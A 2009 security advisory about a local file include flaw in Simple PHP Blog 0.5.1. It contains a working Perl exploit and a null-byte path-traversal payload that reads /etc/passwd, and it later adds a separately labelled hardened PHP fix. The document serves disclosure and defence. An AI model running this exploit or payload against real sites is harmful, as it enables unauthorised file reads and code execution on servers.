[ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local File Include vulnerability

2009-12-21T00:00:00
ID SECURITYVULNS:DOC:22975
Type securityvulns
Reporter Securityvulns
Modified 2009-12-21T00:00:00

Description

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-005
- Original release date: March 2nd, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
=============================================

I. VULNERABILITY

Simple PHP Blog <= 0.5.1 Local File Include vulnerability

II. BACKGROUND

Simple PHP Blog is a blog system that does not require a database and is very easy to install.

III. DESCRIPTION

Simple PHP Blog <= 0.5.1 is affected by a Local File Include vulnerability in 'languages_cgi.php' because the 'blog_language1' parameter is not properly sanitized.

IV. PROOF OF CONCEPT

The affected code:

62 require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

Exploit:

#!/usr/bin/perl
#
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana <at> isecauditors=dot=com
# Internet Security Auditors

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

# Arguments: target host, application path, file to read, session cookie value
if ($#ARGV < 3) {
    die("Usage: $0 <site> <path> <file> <cookie>");
}

my $ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");

# POST to languages_cgi.php; the parameter is inserted unfiltered into require_once()
my $req = HTTP::Request->new(POST => "http://$ARGV[0]$ARGV[1]/languages_cgi.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]%00");

my $res = $ua->request($req);

if ($res->is_success) {
    print $res->content;
} else {
    print "Error: " . $res->status_line, "\n";
}

$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here> | head -1
root:*:0:0:root:/root:/bin/bash

The bug can be exploited with or without 'magic_quotes_gpc'. If magic_quotes_gpc is set to Off, an attacker can read any file (for example /etc/passwd) by appending a '\0' character to the parameter; if it is On, only PHP files can be included, which still allows execution of any local PHP file.

V. BUSINESS IMPACT

An attacker can read arbitrary files in the context of the web server and execute arbitrary local PHP scripts.

VI. SYSTEMS AFFECTED

Versions prior to and including 0.5.1 are affected.

In order to patch the application, the file_exists() and basename() functions must be added to the affected code.

VII. SOLUTION

Change line 62 of languages_cgi.php so that the $_POST[ 'blog_language1' ] variable is filtered:

if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))
    require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');
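As an added example (not the advisory's or the Simple PHP Blog project's code), a fuller hardened replacement for line 62 that combines the allowlist check above with the basename()/file_exists() checks named in section VI. It assumes the languages directory sits beside languages_cgi.php and uses preg_match() instead of ereg(), which was removed in PHP 7.

```php
<?php
// Added example, not from the Simple PHP Blog project.
// Assumption: languages live in <app root>/languages/<name>/strings.php.

/**
 * Validate a language name and return the absolute path of its strings.php,
 * or null if the name is not acceptable. The filesystem is only consulted
 * after the name has already passed the allowlist check.
 */
function language_strings_path(string $lang, string $languages_dir): ?string
{
    // 1. Allowlist: letters, digits and underscore only, anchored at both ends.
    //    This alone rejects '/', '../' and the "\0" terminator used in the PoC.
    //    \A and \z (rather than ^ and $) also refuse a trailing newline.
    if (!preg_match('/\A[a-zA-Z0-9_]+\z/', $lang)) {
        return null;
    }

    // 2. Defence in depth: basename() strips any path component, realpath()
    //    canonicalises (and returns false when the file does not exist, which
    //    covers the file_exists() check), and the result must still sit
    //    under the languages directory even if a symlink is involved.
    $base = realpath($languages_dir);
    if ($base === false) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . basename($lang)
               . DIRECTORY_SEPARATOR . 'strings.php';
    $path = realpath($candidate);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Replacement for the original line 62:
//   require_once('languages/' . $_POST['blog_language1'] . '/strings.php');
$requested = isset($_POST['blog_language1']) ? (string) $_POST['blog_language1'] : 'en';
$strings   = language_strings_path($requested, __DIR__ . '/languages');
if ($strings === null) {
    // Fall back to the default language rather than including attacker input.
    $strings = language_strings_path('en', __DIR__ . '/languages');
}
if ($strings !== null) {
    require_once $strings;
}
```

With this in place a request carrying `blog_language1=../../../../../etc/passwd%00` fails the allowlist before any filesystem access, and a request for a non-existent language name falls back to the default instead of producing a PHP include warning that leaks the path.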

VIII. REFERENCES

http://www.simplephpblog.com
http://sourceforge.net/projects/sphpblog/
http://www.isecauditors.com

IX. CREDITS

This vulnerability has been discovered and reported by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY

March 02, 2009: Initial release.
December 18, 2009: Last revision.

XI. DISCLOSURE TIMELINE

March 02, 2009: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.